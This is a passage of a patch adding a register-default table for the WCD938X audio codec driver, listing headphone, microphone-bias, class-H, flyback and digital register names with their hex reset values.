++	{WCD938X_ANA_MBHC_RESULT_3,                            0x00},
++	{WCD938X_ANA_MBHC_BTN0,                                0x00},
++	{WCD938X_ANA_MBHC_BTN1,                                0x10},
++	{WCD938X_ANA_MBHC_BTN2,                                0x20},
++	{WCD938X_ANA_MBHC_BTN3,                                0x30},
++	{WCD938X_ANA_MBHC_BTN4,                                0x40},
++	{WCD938X_ANA_MBHC_BTN5,                                0x50},
++	{WCD938X_ANA_MBHC_BTN6,                                0x60},
++	{WCD938X_ANA_MBHC_BTN7,                                0x70},
++	{WCD938X_ANA_MICB1,                                    0x10},
++	{WCD938X_ANA_MICB2,                                    0x10},
++	{WCD938X_ANA_MICB2_RAMP,                               0x00},
++	{WCD938X_ANA_MICB3,                                    0x10},
++	{WCD938X_ANA_MICB4,                                    0x10},
++	{WCD938X_BIAS_CTL,                                     0x2A},
++	{WCD938X_BIAS_VBG_FINE_ADJ,                            0x55},
++	{WCD938X_LDOL_VDDCX_ADJUST,                            0x01},
++	{WCD938X_LDOL_DISABLE_LDOL,                            0x00},
++	{WCD938X_MBHC_CTL_CLK,                                 0x00},
++	{WCD938X_MBHC_CTL_ANA,                                 0x00},
++	{WCD938X_MBHC_CTL_SPARE_1,                             0x00},
++	{WCD938X_MBHC_CTL_SPARE_2,                             0x00},
++	{WCD938X_MBHC_CTL_BCS,                                 0x00},
++	{WCD938X_MBHC_MOISTURE_DET_FSM_STATUS,                 0x00},
++	{WCD938X_MBHC_TEST_CTL,                                0x00},
++	{WCD938X_LDOH_MODE,                                    0x2B},
++	{WCD938X_LDOH_BIAS,                                    0x68},
++	{WCD938X_LDOH_STB_LOADS,                               0x00},
++	{WCD938X_LDOH_SLOWRAMP,                                0x50},
++	{WCD938X_MICB1_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB1_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB1_TEST_CTL_3,                             0xA4},
++	{WCD938X_MICB2_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB2_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB2_TEST_CTL_3,                             0x24},
++	{WCD938X_MICB3_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB3_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB3_TEST_CTL_3,                             0xA4},
++	{WCD938X_MICB4_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB4_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB4_TEST_CTL_3,                             0xA4},
++	{WCD938X_TX_COM_ADC_VCM,                               0x39},
++	{WCD938X_TX_COM_BIAS_ATEST,                            0xE0},
++	{WCD938X_TX_COM_SPARE1,                                0x00},
++	{WCD938X_TX_COM_SPARE2,                                0x00},
++	{WCD938X_TX_COM_TXFE_DIV_CTL,                          0x22},
++	{WCD938X_TX_COM_TXFE_DIV_START,                        0x00},
++	{WCD938X_TX_COM_SPARE3,                                0x00},
++	{WCD938X_TX_COM_SPARE4,                                0x00},
++	{WCD938X_TX_1_2_TEST_EN,                               0xCC},
++	{WCD938X_TX_1_2_ADC_IB,                                0xE9},
++	{WCD938X_TX_1_2_ATEST_REFCTL,                          0x0A},
++	{WCD938X_TX_1_2_TEST_CTL,                              0x38},
++	{WCD938X_TX_1_2_TEST_BLK_EN1,                          0xFF},
++	{WCD938X_TX_1_2_TXFE1_CLKDIV,                          0x00},
++	{WCD938X_TX_1_2_SAR2_ERR,                              0x00},
++	{WCD938X_TX_1_2_SAR1_ERR,                              0x00},
++	{WCD938X_TX_3_4_TEST_EN,                               0xCC},
++	{WCD938X_TX_3_4_ADC_IB,                                0xE9},
++	{WCD938X_TX_3_4_ATEST_REFCTL,                          0x0A},
++	{WCD938X_TX_3_4_TEST_CTL,                              0x38},
++	{WCD938X_TX_3_4_TEST_BLK_EN3,                          0xFF},
++	{WCD938X_TX_3_4_TXFE3_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SAR4_ERR,                              0x00},
++	{WCD938X_TX_3_4_SAR3_ERR,                              0x00},
++	{WCD938X_TX_3_4_TEST_BLK_EN2,                          0xFB},
++	{WCD938X_TX_3_4_TXFE2_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SPARE1,                                0x00},
++	{WCD938X_TX_3_4_TEST_BLK_EN4,                          0xFB},
++	{WCD938X_TX_3_4_TXFE4_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SPARE2,                                0x00},
++	{WCD938X_CLASSH_MODE_1,                                0x40},
++	{WCD938X_CLASSH_MODE_2,                                0x3A},
++	{WCD938X_CLASSH_MODE_3,                                0x00},
++	{WCD938X_CLASSH_CTRL_VCL_1,                            0x70},
++	{WCD938X_CLASSH_CTRL_VCL_2,                            0x82},
++	{WCD938X_CLASSH_CTRL_CCL_1,                            0x31},
++	{WCD938X_CLASSH_CTRL_CCL_2,                            0x80},
++	{WCD938X_CLASSH_CTRL_CCL_3,                            0x80},
++	{WCD938X_CLASSH_CTRL_CCL_4,                            0x51},
++	{WCD938X_CLASSH_CTRL_CCL_5,                            0x00},
++	{WCD938X_CLASSH_BUCK_TMUX_A_D,                         0x00},
++	{WCD938X_CLASSH_BUCK_SW_DRV_CNTL,                      0x77},
++	{WCD938X_CLASSH_SPARE,                                 0x00},
++	{WCD938X_FLYBACK_EN,                                   0x4E},
++	{WCD938X_FLYBACK_VNEG_CTRL_1,                          0x0B},
++	{WCD938X_FLYBACK_VNEG_CTRL_2,                          0x45},
++	{WCD938X_FLYBACK_VNEG_CTRL_3,                          0x74},
++	{WCD938X_FLYBACK_VNEG_CTRL_4,                          0x7F},
++	{WCD938X_FLYBACK_VNEG_CTRL_5,                          0x83},
++	{WCD938X_FLYBACK_VNEG_CTRL_6,                          0x98},
++	{WCD938X_FLYBACK_VNEG_CTRL_7,                          0xA9},
++	{WCD938X_FLYBACK_VNEG_CTRL_8,                          0x68},
++	{WCD938X_FLYBACK_VNEG_CTRL_9,                          0x64},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_1,                       0xED},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_2,                       0xF0},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_3,                       0xA6},
++	{WCD938X_FLYBACK_CTRL_1,                               0x65},
++	{WCD938X_FLYBACK_TEST_CTL,                             0x00},
++	{WCD938X_RX_AUX_SW_CTL,                                0x00},
++	{WCD938X_RX_PA_AUX_IN_CONN,                            0x01},
++	{WCD938X_RX_TIMER_DIV,                                 0x32},
++	{WCD938X_RX_OCP_CTL,                                   0x1F},
++	{WCD938X_RX_OCP_COUNT,                                 0x77},
++	{WCD938X_RX_BIAS_EAR_DAC,                              0xA0},
++	{WCD938X_RX_BIAS_EAR_AMP,                              0xAA},
++	{WCD938X_RX_BIAS_HPH_LDO,                              0xA9},
++	{WCD938X_RX_BIAS_HPH_PA,                               0xAA},
++	{WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2,                    0x8A},
++	{WCD938X_RX_BIAS_HPH_RDAC_LDO,                         0x88},
++	{WCD938X_RX_BIAS_HPH_CNP1,                             0x82},
++	{WCD938X_RX_BIAS_HPH_LOWPOWER,                         0x82},
++	{WCD938X_RX_BIAS_AUX_DAC,                              0xA0},
++	{WCD938X_RX_BIAS_AUX_AMP,                              0xAA},
++	{WCD938X_RX_BIAS_VNEGDAC_BLEEDER,                      0x50},
++	{WCD938X_RX_BIAS_MISC,                                 0x00},
++	{WCD938X_RX_BIAS_BUCK_RST,                             0x08},
++	{WCD938X_RX_BIAS_BUCK_VREF_ERRAMP,                     0x44},
++	{WCD938X_RX_BIAS_FLYB_ERRAMP,                          0x40},
++	{WCD938X_RX_BIAS_FLYB_BUFF,                            0xAA},
++	{WCD938X_RX_BIAS_FLYB_MID_RST,                         0x14},
++	{WCD938X_HPH_L_STATUS,                                 0x04},
++	{WCD938X_HPH_R_STATUS,                                 0x04},
++	{WCD938X_HPH_CNP_EN,                                   0x80},
++	{WCD938X_HPH_CNP_WG_CTL,                               0x9A},
++	{WCD938X_HPH_CNP_WG_TIME,                              0x14},
++	{WCD938X_HPH_OCP_CTL,                                  0x28},
++	{WCD938X_HPH_AUTO_CHOP,                                0x16},
++	{WCD938X_HPH_CHOP_CTL,                                 0x83},
++	{WCD938X_HPH_PA_CTL1,                                  0x46},
++	{WCD938X_HPH_PA_CTL2,                                  0x50},
++	{WCD938X_HPH_L_EN,                                     0x80},
++	{WCD938X_HPH_L_TEST,                                   0xE0},
++	{WCD938X_HPH_L_ATEST,                                  0x50},
++	{WCD938X_HPH_R_EN,                                     0x80},
++	{WCD938X_HPH_R_TEST,                                   0xE0},
++	{WCD938X_HPH_R_ATEST,                                  0x54},
++	{WCD938X_HPH_RDAC_CLK_CTL1,                            0x99},
++	{WCD938X_HPH_RDAC_CLK_CTL2,                            0x9B},
++	{WCD938X_HPH_RDAC_LDO_CTL,                             0x33},
++	{WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL,                     0x00},
++	{WCD938X_HPH_REFBUFF_UHQA_CTL,                         0x68},
++	{WCD938X_HPH_REFBUFF_LP_CTL,                           0x0E},
++	{WCD938X_HPH_L_DAC_CTL,                                0x20},
++	{WCD938X_HPH_R_DAC_CTL,                                0x20},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL,               0x55},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_EN,                     0x19},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1,                  0xA0},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS,                 0x00},
++	{WCD938X_EAR_EAR_EN_REG,                               0x22},
++	{WCD938X_EAR_EAR_PA_CON,                               0x44},
++	{WCD938X_EAR_EAR_SP_CON,                               0xDB},
++	{WCD938X_EAR_EAR_DAC_CON,                              0x80},
++	{WCD938X_EAR_EAR_CNP_FSM_CON,                          0xB2},
++	{WCD938X_EAR_TEST_CTL,                                 0x00},
++	{WCD938X_EAR_STATUS_REG_1,                             0x00},
++	{WCD938X_EAR_STATUS_REG_2,                             0x08},
++	{WCD938X_ANA_NEW_PAGE_REGISTER,                        0x00},
++	{WCD938X_HPH_NEW_ANA_HPH2,                             0x00},
++	{WCD938X_HPH_NEW_ANA_HPH3,                             0x00},
++	{WCD938X_SLEEP_CTL,                                    0x16},
++	{WCD938X_SLEEP_WATCHDOG_CTL,                           0x00},
++	{WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL,                 0x00},
++	{WCD938X_MBHC_NEW_CTL_1,                               0x02},
++	{WCD938X_MBHC_NEW_CTL_2,                               0x05},
++	{WCD938X_MBHC_NEW_PLUG_DETECT_CTL,                     0xE9},
++	{WCD938X_MBHC_NEW_ZDET_ANA_CTL,                        0x0F},
++	{WCD938X_MBHC_NEW_ZDET_RAMP_CTL,                       0x00},
++	{WCD938X_MBHC_NEW_FSM_STATUS,                          0x00},
++	{WCD938X_MBHC_NEW_ADC_RESULT,                          0x00},
++	{WCD938X_TX_NEW_AMIC_MUX_CFG,                          0x00},
++	{WCD938X_AUX_AUXPA,                                    0x00},
++	{WCD938X_LDORXTX_MODE,                                 0x0C},
++	{WCD938X_LDORXTX_CONFIG,                               0x10},
++	{WCD938X_DIE_CRACK_DIE_CRK_DET_EN,                     0x00},
++	{WCD938X_DIE_CRACK_DIE_CRK_DET_OUT,                    0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL,                    0x40},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L,                   0x81},
++	{WCD938X_HPH_NEW_INT_RDAC_VREF_CTL,                    0x10},
++	{WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL,                0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R,                   0x81},
++	{WCD938X_HPH_NEW_INT_PA_MISC1,                         0x22},
++	{WCD938X_HPH_NEW_INT_PA_MISC2,                         0x00},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC,                     0x00},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER1,                       0xFE},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER2,                       0x02},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER3,                       0x4E},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER4,                       0x54},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC2,                    0x00},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC3,                    0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW,               0x90},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW,               0x90},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI,              0x62},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP,                 0x01},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP,                   0x11},
++	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL,            0x57},
++	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL,       0x01},
++	{WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT,                0x00},
++	{WCD938X_MBHC_NEW_INT_SPARE_2,                         0x00},
++	{WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON,                  0xA8},
++	{WCD938X_EAR_INT_NEW_CNP_VCM_CON1,                     0x42},
++	{WCD938X_EAR_INT_NEW_CNP_VCM_CON2,                     0x22},
++	{WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS,                 0x00},
++	{WCD938X_AUX_INT_EN_REG,                               0x00},
++	{WCD938X_AUX_INT_PA_CTRL,                              0x06},
++	{WCD938X_AUX_INT_SP_CTRL,                              0xD2},
++	{WCD938X_AUX_INT_DAC_CTRL,                             0x80},
++	{WCD938X_AUX_INT_CLK_CTRL,                             0x50},
++	{WCD938X_AUX_INT_TEST_CTRL,                            0x00},
++	{WCD938X_AUX_INT_STATUS_REG,                           0x00},
++	{WCD938X_AUX_INT_MISC,                                 0x00},
++	{WCD938X_LDORXTX_INT_BIAS,                             0x6E},
++	{WCD938X_LDORXTX_INT_STB_LOADS_DTEST,                  0x50},
++	{WCD938X_LDORXTX_INT_TEST0,                            0x1C},
++	{WCD938X_LDORXTX_INT_STARTUP_TIMER,                    0xFF},
++	{WCD938X_LDORXTX_INT_TEST1,                            0x1F},
++	{WCD938X_LDORXTX_INT_STATUS,                           0x00},
++	{WCD938X_SLEEP_INT_WATCHDOG_CTL_1,                     0x0A},
++	{WCD938X_SLEEP_INT_WATCHDOG_CTL_2,                     0x0A},
++	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1,               0x02},
++	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2,               0x60},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2,               0xFF},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1,               0x7F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0,               0x3F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M,          0x1F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M,          0x0F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1,          0xD7},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0,            0xC8},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP,           0xC6},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1,      0xD5},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0,        0xCA},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP,       0x05},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0,    0xA5},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP,       0x13},
++	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1,             0x88},
++	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP,            0x42},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L2,                  0xFF},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L1,                  0x64},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L0,                  0x64},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP,                 0x77},
++	{WCD938X_DIGITAL_PAGE_REGISTER,                        0x00},
++	{WCD938X_DIGITAL_CHIP_ID0,                             0x00},
++	{WCD938X_DIGITAL_CHIP_ID1,                             0x00},
++	{WCD938X_DIGITAL_CHIP_ID2,                             0x0D},
++	{WCD938X_DIGITAL_CHIP_ID3,                             0x01},
++	{WCD938X_DIGITAL_SWR_TX_CLK_RATE,                      0x00},
++	{WCD938X_DIGITAL_CDC_RST_CTL,                          0x03},
++	{WCD938X_DIGITAL_TOP_CLK_CFG,                          0x00},
++	{WCD938X_DIGITAL_CDC_ANA_CLK_CTL,                      0x00},
++	{WCD938X_DIGITAL_CDC_DIG_CLK_CTL,                      0xF0},
++	{WCD938X_DIGITAL_SWR_RST_EN,                           0x00},
++	{WCD938X_DIGITAL_CDC_PATH_MODE,                        0x55},
++	{WCD938X_DIGITAL_CDC_RX_RST,                           0x00},
++	{WCD938X_DIGITAL_CDC_RX0_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_RX1_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_RX2_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1,                  0x00},
++	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3,                  0x00},
++	{WCD938X_DIGITAL_CDC_COMP_CTL_0,                       0x00},
++	{WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL,                   0x1E},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_0,                     0x00},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_1,                     0x01},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_0,                     0x63},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_1,                     0x04},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_0,                     0xAC},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_1,                     0x04},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_0,                     0x1A},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_1,                     0x03},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_0,                     0xBC},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A6_0,                     0xC7},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A7_0,                     0xF8},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_0,                      0x47},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_1,                      0x43},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_2,                      0xB1},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_3,                      0x17},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R1,                       0x4D},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R2,                       0x29},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R3,                       0x34},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R4,                       0x59},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R5,                       0x66},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R6,                       0x87},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R7,                       0x64},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_0,                     0x00},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_1,                     0x01},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_0,                     0x96},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_1,                     0x09},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_0,                     0xAB},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_1,                     0x05},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_0,                     0x1C},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_0,                     0x17},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A6_0,                     0xAA},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A7_0,                     0xE3},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_0,                      0x69},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_1,                      0x54},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_2,                      0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_3,                      0x15},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R1,                       0xA4},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R2,                       0xB5},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R3,                       0x86},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R4,                       0x85},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R5,                       0xAA},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R6,                       0xE2},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R7,                       0x62},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0,                    0x55},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1,                    0xA9},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0,                   0x3D},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1,                   0x2E},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2,                   0x01},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0,                   0x00},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1,                   0xFC},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2,                   0x01},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_EAR_PATH_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_SWR_CLH,                          0x00},
++	{WCD938X_DIGITAL_SWR_CLH_BYP,                          0x00},
++	{WCD938X_DIGITAL_CDC_TX0_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX1_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX2_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX_RST,                           0x00},
++	{WCD938X_DIGITAL_CDC_REQ_CTL,                          0x01},
++	{WCD938X_DIGITAL_CDC_RST,                              0x00},
++	{WCD938X_DIGITAL_CDC_AMIC_CTL,                         0x0F},
++	{WCD938X_DIGITAL_CDC_DMIC_CTL,                         0x04},
++	{WCD938X_DIGITAL_CDC_DMIC1_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC2_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC3_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC4_CTL,                        0x01},
++	{WCD938X_DIGITAL_EFUSE_PRG_CTL,                        0x00},
++	{WCD938X_DIGITAL_EFUSE_CTL,                            0x2B},
++	{WCD938X_DIGITAL_CDC_DMIC_RATE_1_2,                    0x11},
++	{WCD938X_DIGITAL_CDC_DMIC_RATE_3_4,                    0x11},
++	{WCD938X_DIGITAL_PDM_WD_CTL0,                          0x00},
++	{WCD938X_DIGITAL_PDM_WD_CTL1,                          0x00},
++	{WCD938X_DIGITAL_PDM_WD_CTL2,                          0x00},
++	{WCD938X_DIGITAL_INTR_MODE,                            0x00},
++	{WCD938X_DIGITAL_INTR_MASK_0,                          0xFF},
++	{WCD938X_DIGITAL_INTR_MASK_1,                          0xFF},
++	{WCD938X_DIGITAL_INTR_MASK_2,                          0x3F},
++	{WCD938X_DIGITAL_INTR_STATUS_0,                        0x00},
++	{WCD938X_DIGITAL_INTR_STATUS_1,                        0x00},
++	{WCD938X_DIGITAL_INTR_STATUS_2,                        0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_0,                         0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_1,                         0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_2,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_0,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_1,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_2,                         0x00},
++	{WCD938X_DIGITAL_INTR_SET_0,                           0x00},
++	{WCD938X_DIGITAL_INTR_SET_1,                           0x00},
++	{WCD938X_DIGITAL_INTR_SET_2,                           0x00},
++	{WCD938X_DIGITAL_INTR_TEST_0,                          0x00},
++	{WCD938X_DIGITAL_INTR_TEST_1,                          0x00},
++	{WCD938X_DIGITAL_INTR_TEST_2,                          0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_EN,                       0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_0_1,                      0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_2_3,                      0x00},
++	{WCD938X_DIGITAL_LB_IN_SEL_CTL,                        0x00},
++	{WCD938X_DIGITAL_LOOP_BACK_MODE,                       0x00},
++	{WCD938X_DIGITAL_SWR_DAC_TEST,                         0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_RX_0,                     0x40},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_0,                     0x40},
++	{WCD938X_DIGITAL_SWR_HM_TEST_RX_1,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_1,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_2,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_0,                        0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_1,                        0x00},
++	{WCD938X_DIGITAL_PAD_CTL_SWR_0,                        0x8F},
++	{WCD938X_DIGITAL_PAD_CTL_SWR_1,                        0x06},
++	{WCD938X_DIGITAL_I2C_CTL,                              0x00},
++	{WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE,                0x00},
++	{WCD938X_DIGITAL_EFUSE_TEST_CTL_0,                     0x00},
++	{WCD938X_DIGITAL_EFUSE_TEST_CTL_1,                     0x00},
++	{WCD938X_DIGITAL_EFUSE_T_DATA_0,                       0x00},
++	{WCD938X_DIGITAL_EFUSE_T_DATA_1,                       0x00},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_RX0,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_RX1,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX0,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX1,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX2,                      0xF1},
++	{WCD938X_DIGITAL_PAD_INP_DIS_0,                        0x00},
++	{WCD938X_DIGITAL_PAD_INP_DIS_1,                        0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_0,                     0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_1,                     0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_2,                     0x00},
++	{WCD938X_DIGITAL_RX_DATA_EDGE_CTL,                     0x1F},
++	{WCD938X_DIGITAL_TX_DATA_EDGE_CTL,                     0x80},
++	{WCD938X_DIGITAL_GPIO_MODE,                            0x00},
++	{WCD938X_DIGITAL_PIN_CTL_OE,                           0x00},
++	{WCD938X_DIGITAL_PIN_CTL_DATA_0,                       0x00},
++	{WCD938X_DIGITAL_PIN_CTL_DATA_1,                       0x00},
++	{WCD938X_DIGITAL_PIN_STATUS_0,                         0x00},
++	{WCD938X_DIGITAL_PIN_STATUS_1,                         0x00},
++	{WCD938X_DIGITAL_DIG_DEBUG_CTL,                        0x00},
++	{WCD938X_DIGITAL_DIG_DEBUG_EN,                         0x00},
++	{WCD938X_DIGITAL_ANA_CSR_DBG_ADD,                      0x00},
++	{WCD938X_DIGITAL_ANA_CSR_DBG_CTL,                      0x48},
++	{WCD938X_DIGITAL_SSP_DBG,                              0x00},
++	{WCD938X_DIGITAL_MODE_STATUS_0,                        0x00},
++	{WCD938X_DIGITAL_MODE_STATUS_1,                        0x00},
++	{WCD938X_DIGITAL_SPARE_0,                              0x00},
++	{WCD938X_DIGITAL_SPARE_1,                              0x00},
++	{WCD938X_DIGITAL_SPARE_2,                              0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_0,                          0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_1,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_2,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_3,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_4,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_5,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_6,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_7,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_8,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_9,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_10,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_11,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_12,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_13,                         0xFF},
